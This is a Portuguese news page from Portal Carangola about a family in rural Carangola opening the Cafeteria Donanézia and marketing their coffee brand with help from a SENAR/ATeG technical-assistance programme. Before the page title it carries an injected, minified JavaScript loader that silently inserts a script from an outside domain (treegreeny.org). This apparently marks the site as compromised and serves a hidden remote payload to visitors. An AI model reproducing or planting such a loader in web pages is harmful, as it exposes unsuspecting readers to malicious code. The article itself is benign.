;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Cafeteria na zona rural é aposta de família de Carangola. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Cafeteria na zona rural é aposta de família de Carangola.

Dedicada e apaixonada pelo café, a jovem Monyqui Alves Cireli e os seus pais José Curvelo Cireli e Miriam Rodrigues Alves Cireli, preparam-se para abrir a Cafeteria Donanézia na comunidade de Conceição, em Carangola. Em agosto de 2020, a família entrou para o Programa de Assistência Técnica e Gerencial (ATeG) Café, que tem colaborado especialmente na gestão do negócio.

A cafeteria será a nova aposta da família, que comercializa o café Donanézia desde 2019. A marca tem linhas de café tradicional e especial, torrado, em grãos e moído. Os produtos são vendidos em Carangola e em cidades do Rio de Janeiro e do Espírito Santo.

“O empreendimento será um espaço para divulgação dos produtos da família e de outros produtores da comunidade e um incentivo à prática do turismo. Vi a necessidade de ter um lugar que chamasse a atenção das pessoas para a nossa comunidade, que é rica em lindas paisagens montanhosas, que muitas vezes passam despercebidas”.

Monyqui já participou dos cursos de Classificação e Degustação, Torra, Barista e Comercialização de Café do Sistema FAEMG/SENAR/INAES, e foi a capacitação que a encorajou a empreender. “O SENAR MINAS tem cumprido o seu compromisso com nós, produtores, e tem sido muito gratificante ter a escola do campo nos dando esse apoio que é tão importante: o conhecimento”.

Força feminina

O nome da cafeteria e da marca de cafés da família é uma homenagem à bisavó de Monyqui, Dona Anésia, que assim como a neta, foi uma produtora rural dedicada. A jovem diz se inspirar na força da bisavó para conquistar o seu espaço no mercado de cafés especiais.

A mulher é indispensável pois a colheita seletiva exige atenção, paciência e, principalmente, capricho. Meu pai sempre fez questão de estarmos envolvidas, minha mãe e eu, nas atividades da propriedade, e com a participação no programa ATeG essa realidade foi reforçada. Temos dificuldades a enfrentar, mas os resultados alcançados até agora são excelentes, comentou.

Vale destacar que Monyqui faz parte de grupos de mulheres da sua comunidade. Juntas elas atuam para compartilhar e fortalecer ideias e desenvolver estratégias de crescimento.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.